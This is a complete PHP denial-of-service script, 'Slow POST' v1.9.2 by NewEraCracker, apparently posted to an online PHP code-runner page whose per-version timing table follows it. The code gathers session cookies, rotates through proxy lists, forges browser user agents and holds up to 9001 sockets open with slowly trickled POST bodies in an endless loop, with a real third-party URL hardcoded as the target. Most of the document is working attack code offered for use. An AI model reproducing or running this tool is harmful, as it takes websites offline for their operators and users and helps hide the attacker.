@ 2013-05-13T06:17:18Z <?php
set_time_limit(0);
ignore_user_abort(true);
$_SERVER['argv'][1] = 'http://support.ioncube.com/winapp/';
//-------------------------
// CONFiG
//-------------------------
$CONFIG['max_cookies'] = 20;
$CONFIG['max_sockets'] = 9001;
$CONFIG['timeout_ms'] = 500;
$CONFIG['usleep_time'] = 10;
//-------------------------
// INiT
//-------------------------
// Define EXPLOIT_VERSION
if(!defined('EXPLOIT_VERSION'))
define('EXPLOIT_VERSION', 'v1.9.2');
// Define STDIN
if(!defined('STDIN'))
define('STDIN', fopen('php://stdin', 'r'));
// Check SAPI
if(PHP_SAPI != 'cli') {
echo 'This script is not meant to be ran via browser.';
exit(1);
}
// Globals - DO NOT EDIT
$global_proxy_array = array();
//-------------------------
// FUNCTiONS FOR THE LULZ
//-------------------------
/** Read STDIN and return it */
function readSTDIN() {
$file = STDIN;
if(!$file) return false;
return trim(fgets($file));
}
/** Receive a filename that has proxies listed in it and fills the $global_proxy_array */
function proxyLoadFile($filename) {
global $global_proxy_array;
// Load proxy list file
$filename = str_replace('\\', '/', $filename);
$content = @file_get_contents($filename);
if(!$filename || !$content) {
echo $filename.' is not a valid proxy-list file!';
exit(1);
}
$content = str_replace(array("\r\n", "\r"), "\n", $content);
$content = explode("\n", $content);
// Grab the proxies
foreach($content as $value) {
$tmp = explode(':', $value);
if(isset($tmp[0], $tmp[1])) {
$tmp[0] = trim($tmp[0]);
$tmp[1] = (int)(trim($tmp[1]));
// The proxy
$global_proxy_array[] = array('host' => $tmp[0], 'port' => $tmp[1]);
}
}
}
/** Returns a random a proxy */
function proxyGetRandom() {
global $global_proxy_array;
// Give a random proxy
if(count($global_proxy_array)) {
$proxy = null;
while(!$proxy) {
$rand = mt_rand(0, count($global_proxy_array) - 1);
$proxy = (isset($global_proxy_array[$rand]) ? $global_proxy_array[$rand] : null);
}
return $proxy;
}
return false;
}
/** Returns a random useragent */
function randomUserAgent() {
// Microsoft Windows versions
$os = array('5.0', '5.1', '5.2', '6.0', '6.1', '6.2');
// Select a random version
$os = $os[mt_rand(0, count($os) - 1)];
// Select a random browser
if(mt_rand(0, 1)) {
// Internet Explorer versions
$ua[0] = array('4.0', '7.0', '4.0');
$ua[1] = array('4.0', '8.0', '4.0');
$ua[2] = array('5.0', '9.0', '5.0');
$ua[3] = array('5.0', '10.0', '6.0');
// Random IE
$ua = $ua[mt_rand(0, count($ua) - 1)];
return "Mozilla/{$ua[0]} (compatible; MSIE {$ua[1]}; Windows NT {$os}; Trident/{$ua[2]})";
} else {
// Mozilla Firefox versions
$ua = array('17.0', '18.0', '19.0', '20.0', '21.0');
// Random FF
$ua = $ua[mt_rand(0, count($ua) - 1)];
return "Mozilla/5.0 (Windows NT {$os}; rv:{$ua}) Gecko/20100101 Firefox/{$ua}";
}
}
/** Opens a custom socket and returns it */
function openCustomSocket($newEraUrl, $newEraProxy = null) {
global $CONFIG;
@ini_set('default_socket_timeout', 1);
$newEraConnection = (($newEraProxy == null) ? $newEraUrl : $newEraProxy);
$host = (($newEraConnection->ssl) ? 'ssl://' : 'tcp://').$newEraConnection->name;
$fp = @fsockopen($host, $newEraConnection->port);
if(!$fp)
return false;
stream_set_blocking($fp, 0);
stream_set_timeout($fp, 0, $CONFIG['timeout_ms']);
return $fp;
}
/**
* Receives a socket and performs the start of a slowPosting
* Returns Content-Length on success and false on failure
*/
function slowPostStart($sock, $newEraUrl, $newEraProxy, $cookie) {
// Check the socket
if(!$sock)
return false;
// Generate a random Content-Length
$length = mt_rand(1337, 133700);
// Build
$header = 'POST '.($newEraProxy ? $newEraUrl->full_url : $newEraUrl->path).' HTTP/1.1'."\r\n";
$header .= 'Host: '.$newEraUrl->name."\r\n";
$header .= 'Connection: Keep-Alive'."\r\n";
$header .= 'Accept: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'."\r\n";
$header .= 'User-Agent: '.randomUserAgent()."\r\n";
$header .= 'Accept-Language: en-US;q=0.8,en;q=0.6'."\r\n";
$header .= 'Accept-Encoding: gzip,deflate'."\r\n";
$header .= 'Keep-Alive: '.mt_rand(60, 120)."\r\n";
$header .= 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8'."\r\n";
$header .= mt_rand(0, 1) ? 'Referer: '.$newEraUrl->full_url."\r\n" : '';
$header .= ($cookie ? "Cookie: {$cookie}\r\n" : '');
$header .= 'Content-Length: '.$length."\r\n";
$header .= "\r\n";
// Do it
@fwrite($sock, $header);
return $length;
}
/** Receives a socket and continues the slowPosting */
function slowPostContinue($sock, $bytes = 5) {
global $CONFIG;
// Check the socket
if(!$sock)
return false;
// Check the $bytes
if(intval($bytes) != $bytes)
$bytes = 5;
// Throttle execution speed slightly
if($CONFIG['usleep_time'] > 0)
@usleep($CONFIG['usleep_time']);
// Do it :D
$tmp = '';
for($j = 0; $j < $bytes; $j++)
$tmp .= chr(mt_rand(33, 126));
@fwrite($sock, urlencode($tmp));
return true;
}
//-------------------------
// CLASSES FOR THE LULZ
//-------------------------
/** I want cookies! Give me cookies! */
class NewEraCookies {
private $max_cookies;
private $cookies = array();
/** Constructor */
public function __construct($newEraUrl, $newEraProxy, $max_cookies, $proxyFile = null, $output = false) {
$this->update_object($newEraUrl, $newEraProxy, $max_cookies, $proxyFile, $output);
}
/** Object updater */
public function update_object($newEraUrl, $newEraProxy, $max_cookies, $proxyFile = null, $output = false) {
$this->max_cookies = $max_cookies;
$this->cookies = array();
if($output)
echo PHP_EOL.'BUILDING COOKIES ';
for($i = 0; $i < $this->max_cookies; $i++) {
// Using Proxy file?
if($proxyFile) {
$newproxy = proxyGetRandom();
if(!$newproxy)
exit($proxyFile.' is not a valid proxy-list file!');
$newEraProxy->update_object('tcp://'.$newproxy['host'].':'.$newproxy['port']);
}
$this->cookies[$i] = self::cookieGrab($newEraUrl, $newEraProxy);
if($output)
echo '.';
}
}
/** Returns a cookie by its index */
public function returnCookieByIndex($idx) {
if($idx == 'random')
$idx = mt_rand(0, $this->max_cookies - 1);
if(isset($this->cookies[$idx]))
return $this->cookies[$idx];
return '';
}
/** Function to parse set-cookie from header fields */
public static function cookieParse($header) {
$cookies = array();
foreach($header as $line) {
if(preg_match('/^Set-Cookie: /i', $line)) {
$line = preg_replace('/^Set-Cookie: /i', '', trim($line));
$csplit = explode(';', $line);
$cdata = array();
$grabbed_cookie_data = false;
foreach($csplit as $data) {
$cinfo = explode('=', $data);
$cinfo[0] = trim($cinfo[0]);
if(!$grabbed_cookie_data) {
$cdata['value']['key'] = $cinfo[0];
$cdata['value']['value'] = $cinfo[1];
$grabbed_cookie_data = true;
continue;
}
$cinfo[0] = strtolower($cinfo[0]);
if($cinfo[0] == 'expires') $cinfo[1] = @strtotime($cinfo[1]);
if($cinfo[0] == 'secure') $cinfo[1] = 'true';
if(in_array($cinfo[0], array('domain', 'expires', 'path', 'secure', 'comment'))) {
$cdata[$cinfo[0]] = $cinfo[1];
}
}
$cookies[] = $cdata;
}
}
return $cookies;
}
/** Function to build the request cookie header from parsed set-cookie data */
public static function cookieBuild($data) {
if(is_array($data)) {
$cookie = array();
foreach($data as $d)
$cookie[] = $d['value']['key'].'='.$d['value']['value'];
if(count($cookie) > 0)
return trim(implode('; ', $cookie));
}
return false;
}
/** Function to grab cookies from an url using PHP's fopen */
public static function cookieGrab($newEraUrl, $newEraProxy = null) {
// Build connection header
$header = 'Host: '.$newEraUrl->name."\r\n";
$header .= 'Connection: Keep-Alive'."\r\n";
$header .= 'Accept: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'."\r\n";
$header .= 'User-Agent: '.randomUserAgent()."\r\n";
$header .= 'Accept-Language: en-US;q=0.8,en;q=0.6'."\r\n";
$header .= 'Accept-Encoding: gzip,deflate'."\r\n";
$header .= 'Keep-Alive: '.mt_rand(60, 120)."\r\n";
// Check proxy url
if($newEraProxy) {
// Enable proxy
$proxy_url = $newEraProxy->full_url;
$request_fulluri = true;
} else {
// Disable proxy
$proxy_url = '';
$request_fulluri = false;
}
// Build stream context
$context = stream_context_create(array(
'http' => array(
'method' => 'GET',
'timeout' => (3),
'header' => $header,
'proxy' => $proxy_url,
'request_fulluri' => $request_fulluri,
'max_redirects' => (0),
'protocol_version' => (1.1),
'ignore_errors' => true
),
'ssl' => array(
'verify_peer' => false
)
));
// Let the fun begin
$cookie = '';
$handle = @fopen($newEraUrl->full_url, 'r', false, $context);
// I hope this does work
if($handle) {
// If it worked, we grab the cookies
$metadata = stream_get_meta_data($handle);
$cookie = self::cookieBuild(self::cookieParse($metadata['wrapper_data']));
// Fun is only at a small distance
@fclose($handle);
}
return $cookie;
}
}
/** Class to construct and handle an url-like object */
class NewEraUrl {
private $host_full_url;
private $host_protocol;
private $host_ssl;
private $host_name;
private $host_port;
private $host_path;
/** Constructor */
public function __construct($host_full_url) {
$this->update_object($host_full_url);
}
/** Object updater */
public function update_object($host_full_url) {
$this->host_full_url = $host_full_url;
$this->host_ssl = ((strpos($this->host_full_url, 'https') === 0) ? true : false);
$this->host_protocol = ($this->host_ssl ? 'https' : 'http');
// Grab other parameters
$host_full_url = explode('/', $host_full_url, 4);
$host_full_url[2] = explode(':', $host_full_url[2], 2);
// Host, Port, Path
$this->host_name = $host_full_url[2][0];
$this->host_port = (isset($host_full_url[2][1]) ? $host_full_url[2][1] : ($this->host_ssl ? 443 : 80));
$this->host_path = '/'.(isset($host_full_url[3]) ? $host_full_url[3] : '');
}
/** Getter for the private properties */
public function __get($var) {
$var = 'host_'.$var;
if(isset($this->{$var}))
return $this->{$var};
}
/** Quick check to see if url is minimally valid */
public static function isValid($host_full_url) {
if(strpos($host_full_url, 'https://') === 0 || strpos($host_full_url, 'http://') === 0)
return true;
}
}
/** Class to construct and handle a proxy-like object */
class NewEraProxy {
private $proxy_full_url;
private $proxy_protocol;
private $proxy_ssl;
private $proxy_name;
private $proxy_port;
/** Constructor */
public function __construct($proxy_full_url) {
$this->update_object($proxy_full_url);
}
/** Object updater */
public function update_object($proxy_full_url) {
$this->proxy_full_url = $proxy_full_url;
$this->proxy_ssl = ((strpos($this->proxy_full_url, 'ssl') === 0) ? true : false);
$this->proxy_protocol = ($this->proxy_ssl ? 'ssl' : 'tcp');
// Grab other parameters
if(false !== ($tmp = strpos($proxy_full_url, '://')))
$proxy_full_url = substr($proxy_full_url, $tmp + 3);
$proxy_full_url = explode(':', $proxy_full_url);
// Host, Port, Path
$this->proxy_name = $proxy_full_url[0];
$this->proxy_port = (int)(isset($proxy_full_url[1]) ? $proxy_full_url[1] : ($this->proxy_ssl ? '443' : '80'));
}
/** Getter for the private properties */
public function __get($var) {
$var = 'proxy_'.$var;
if(property_exists($this, $var))
return $this->{$var};
}
}
//-------------------------
// MAiN CODE FOR THE LULZ
//-------------------------
echo "
_______. __ ______ ____ __ ____
/ || | / __ \ \ \ / \ / /
| (----`| | | | | | \ \/ \/ /
\ \ | | | | | | \ /
.----) | | `----.| `--' | \ /\ /
|_______/ |_______| \______/ \__/ \__/
.______ ______ _______.___________.
| _ \ / __ \ / | |
| |_) | | | | | | (----`---| |----`
| ___/ | | | | \ \ | |
| | | `--' | .----) | | |
| _| \______/ |_______/ |__|
";
echo PHP_EOL.EXPLOIT_VERSION.' by NewEraCracker'.PHP_EOL;
// Fetch the URL to attack
$url = null;
if(isset($_SERVER['argv'][1]) && NewEraUrl::isValid($_SERVER['argv'][1]))
$url = $_SERVER['argv'][1];
// Fetch proxy to use
$proxy['host'] = null;
$proxy['port'] = null;
$proxy['file'] = false;
if(!empty($url) && isset($_SERVER['argv'][2])) {
if($proxy = explode(':', $_SERVER['argv'][2])) {
if(isset($proxy[0], $proxy[1])) {
$proxy['file'] = false;
$proxy['host'] = $proxy[0];
$proxy['port'] = (int)($proxy[1]);
unset($proxy[0], $proxy[1]);
}
}
if(!(isset($proxy['host'], $proxy['port'])) && is_readable($_SERVER['argv'][2])) {
$proxy['file'] = true;
$proxy['filename'] = $_SERVER['argv'][2];
}
}
// Ask for proxy
if(empty($url) && (empty($proxy['host']) || empty($proxy['port'])) && !$proxy['file']) {
$proxy['use'] = null;
while(!$proxy['use']) {
echo PHP_EOL.'Do you want to use a proxy [yes/no/file]: ';
$proxy['use'] = readSTDIN();
if(strpos(strtolower($proxy['use']), 'n') === 0) {
break;
} elseif(strpos(strtolower($proxy['use']), 'y') === 0) {
echo PHP_EOL.'Proxy IP: ';
$proxy['host'] = readSTDIN();
echo PHP_EOL.'Proxy Port: ';
$proxy['port'] = (int)(readSTDIN());
} elseif(strpos(strtolower($proxy['use']), 'f') === 0) {
echo PHP_EOL.'Proxy file: ';
$proxy['filename'] = readSTDIN();
if(is_readable($proxy['filename'])) {
$proxy['file'] = true;
} else {
echo PHP_EOL.'Invalid file!'.PHP_EOL;
$proxy['use'] = null;
}
} else {
$proxy['use'] = null;
echo PHP_EOL.'Invalid choice!'.PHP_EOL;
}
}
unset($proxy['use']);
}
// Ask for target URL
while(!$url) {
echo PHP_EOL.'Target url: ';
$url = readSTDIN();
if(NewEraUrl::isValid($url)) break;
$url = null;
echo PHP_EOL.'Invalid target!'.PHP_EOL;
}
// Init proxy suport
if(empty($proxy['host']) || empty($proxy['port'])) {
$newEraProxy = null;
if(!empty($proxy['file'])) {
proxyLoadFile($proxy['filename']);
$newproxy = proxyGetRandom();
if(!$newproxy)
exit($proxy['filename'].' is not a valid proxy-list file!');
$newEraProxy = new NewEraProxy('tcp://'.$newproxy['host'].':'.$newproxy['port']);
}
} else {
$newEraProxy = new NewEraProxy('tcp://'.$proxy['host'].':'.$proxy['port']);
}
// Init the others
$newEraUrl = new NewEraUrl($url);
$newEraCookies = new NewEraCookies($newEraUrl, $newEraProxy, $CONFIG['max_cookies'], $proxy['file'], true);
// Start
echo PHP_EOL.'IMMA FIRIN MAH LAZOR ';
$fp = array();
// Do it
while(1) {
for($i = 0; $i < $CONFIG['max_sockets']; $i++) {
// Using Proxy file?
if($proxy['file']) {
$newproxy = proxyGetRandom();
if(!$newproxy)
exit($proxy['filename'].' is not a valid proxy-list file!');
$newEraProxy->update_object('tcp://'.$newproxy['host'].':'.$newproxy['port']);
}
// Open a new socket
$tmp = array();
if($tmp['sock'] = openCustomSocket($newEraUrl, $newEraProxy)) {
// Progress bar
echo '.';
// Start a new slowPost and find its length
if($tmp['length'] = slowPostStart($tmp['sock'], $newEraUrl, $newEraProxy, $newEraCookies->returnCookieByIndex('random'))) {
if(isset($fp[$i], $fp[$i]['sock'])) {
// Close connection in the global socket array if it is being used
@fclose($fp[$i]['sock']);
unset($fp[$i]);
}
// Save the new socket in the global socket array
$fp[$i] = $tmp;
} else {
// Epic fail?
@fclose($tmp['sock']);
}
}
unset($tmp);
// Check the current sockets
foreach($fp as $k => $v) {
if($fp[$k]['length'] > 0) {
// Contine old slowPosts
$tmp = ($fp[$k]['length'] < 5) ? $fp[$k]['length'] : 5;
slowPostContinue($fp[$k]['sock'], $tmp);
$fp[$k]['length'] -= $tmp;
} else {
// Close completed slowPosts
@fclose($fp[$k]['sock']);
unset($fp[$k]);
}
}
}
}
?>
Enable javascript to submit You have javascript disabled. You will not be able to edit any code.
Here you find the average performance (time & memory) of each version. A grayed out version indicates it didn't complete successfully (based on exit-code).
Version System time (s) User time (s) Memory (MiB) 8.3.6 1.117 0.887 18.92 8.3.5 1.129 0.872 22.05 8.3.4 1.139 0.863 19.48 8.3.3 1.214 0.790 19.52 8.3.2 1.179 0.822 19.32 8.3.1 1.179 0.823 20.86 8.3.0 1.220 0.783 23.91 8.2.18 1.189 0.813 17.25 8.2.17 1.203 0.800 22.96 8.2.16 1.089 0.913 20.72 8.2.15 1.203 0.800 24.18 8.2.14 1.113 0.890 24.66 8.2.13 1.159 0.843 26.16 8.2.12 1.091 0.914 19.63 8.2.11 1.132 0.869 20.67 8.2.10 1.060 0.943 18.28 8.2.9 0.733 1.270 19.58 8.2.8 0.628 1.370 18.25 8.2.7 0.684 1.320 18.13 8.2.6 0.623 1.379 18.54 8.2.5 0.656 1.345 18.53 8.2.4 0.682 1.317 18.66 8.2.3 0.640 1.363 20.06 8.2.2 0.676 1.326 18.33 8.2.1 0.606 1.395 18.24 8.2.0 0.583 1.420 18.23 8.1.28 1.187 0.817 25.92 8.1.27 1.233 0.770 23.99 8.1.26 1.179 0.823 26.35 8.1.25 1.179 0.823 28.09 8.1.24 1.148 0.852 22.47 8.1.23 1.140 0.863 18.08 8.1.22 0.584 1.421 18.18 8.1.21 0.680 1.323 18.77 8.1.20 0.663 1.340 17.73 8.1.19 0.683 1.319 17.91 8.1.18 0.637 1.368 18.13 8.1.17 0.687 1.318 19.00 8.1.16 0.726 1.275 19.42 8.1.15 0.713 1.289 19.18 8.1.14 0.732 1.268 17.82 8.1.13 0.692 1.308 18.24 8.1.12 0.693 1.309 17.91 8.1.11 0.640 1.363 17.90 8.1.10 0.696 1.305 17.90 8.1.9 0.663 1.340 17.88 8.1.8 0.706 1.295 17.94 8.1.7 0.676 1.326 17.85 8.1.6 0.643 1.358 18.01 8.1.5 0.580 1.423 17.93 8.1.4 0.657 1.347 17.91 8.1.3 0.586 1.415 18.01 8.1.2 0.637 1.367 18.04 8.1.1 0.609 1.391 17.97 8.1.0 0.656 1.345 17.95 8.0.30 0.694 1.311 18.77 8.0.29 0.692 1.308 17.13 8.0.28 0.784 1.220 18.88 8.0.27 0.743 1.259 17.75 8.0.26 0.633 1.369 17.38 8.0.25 0.630 1.373 17.48 8.0.24 0.652 1.346 17.31 8.0.23 0.670 1.333 17.38 8.0.22 0.627 1.377 17.42 8.0.21 0.643 1.360 17.36 8.0.20 0.643 1.359 17.37 8.0.19 0.629 1.372 17.37 8.0.18 0.592 1.408 17.35 8.0.17 0.599 1.402 17.35 8.0.16 0.663 1.339 17.44 8.0.15 0.556 1.444 17.25 8.0.14 0.646 1.355 17.24 8.0.13 0.591 1.407 13.83 8.0.12 1.458 0.493 17.43 8.0.11 1.502 0.435 17.32 8.0.10 1.490 0.453 17.21 8.0.9 1.469 0.471 17.38 8.0.8 1.339 0.596 17.40 8.0.7 1.519 0.440 17.42 8.0.6 1.488 0.482 17.43 8.0.5 1.464 0.496 17.30 8.0.3 1.500 0.455 17.54 8.0.2 1.459 0.504 17.42 8.0.1 1.488 0.469 17.44 8.0.0 1.471 0.492 17.22 7.4.33 0.586 1.415 14.98 7.4.32 0.613 1.390 16.76 7.4.30 0.556 1.445 16.85 7.4.29 0.536 1.466 16.87 7.4.28 0.636 1.366 16.76 7.4.27 0.656 1.344 16.75 7.4.26 0.593 1.410 13.75 7.4.25 1.395 0.528 16.95 7.4.24 1.492 0.445 16.75 7.4.23 1.414 0.544 16.80 7.4.22 1.353 0.538 16.78 7.4.21 1.300 0.602 16.84 7.4.20 1.424 0.521 17.03 7.4.19 1.518 0.423 16.84 7.4.16 1.453 0.523 16.93 7.4.15 1.520 0.432 17.40 7.4.14 1.484 0.478 17.86 7.4.13 1.483 0.489 16.92 7.4.12 1.475 0.494 16.89 7.4.11 1.499 0.570 16.90 7.4.10 1.567 0.499 16.88 7.4.9 1.506 0.551 16.93 7.4.8 1.497 0.488 19.37 7.4.7 1.468 0.522 16.91 7.4.6 1.414 0.575 16.80 7.4.5 1.475 0.445 16.82 7.4.4 1.494 0.550 22.27 7.4.3 1.354 0.592 16.93 7.3.33 0.560 1.443 13.71 7.3.32 0.569 1.431 13.86 7.3.31 1.479 0.458 16.98 7.3.30 1.528 0.409 16.81 7.3.29 1.326 0.609 16.79 7.3.28 1.373 0.558 16.75 7.3.27 1.445 0.513 17.40 7.3.26 1.486 0.464 18.24 7.3.25 1.385 0.393 16.89 7.3.24 1.426 0.461 16.81 7.3.23 1.548 0.501 16.74 7.3.21 1.484 0.575 16.75 7.3.20 1.375 0.608 19.39 7.3.19 1.346 0.629 16.80 7.3.18 1.389 0.605 16.86 7.3.17 1.323 0.632 16.82 7.3.16 1.454 0.538 16.79 7.2.33 1.519 0.545 17.07 7.2.32 1.349 0.643 17.05 7.2.31 1.386 0.604 17.16 7.2.30 1.359 0.576 17.14 7.2.29 1.447 0.576 16.88 7.2.10 1.279 0.347 14.77 7.1.22 0.650 0.215 14.29 5.6.38 1.127 0.406 14.67
preferences:dark mode live preview
35.27 ms | 401 KiB | 5 Q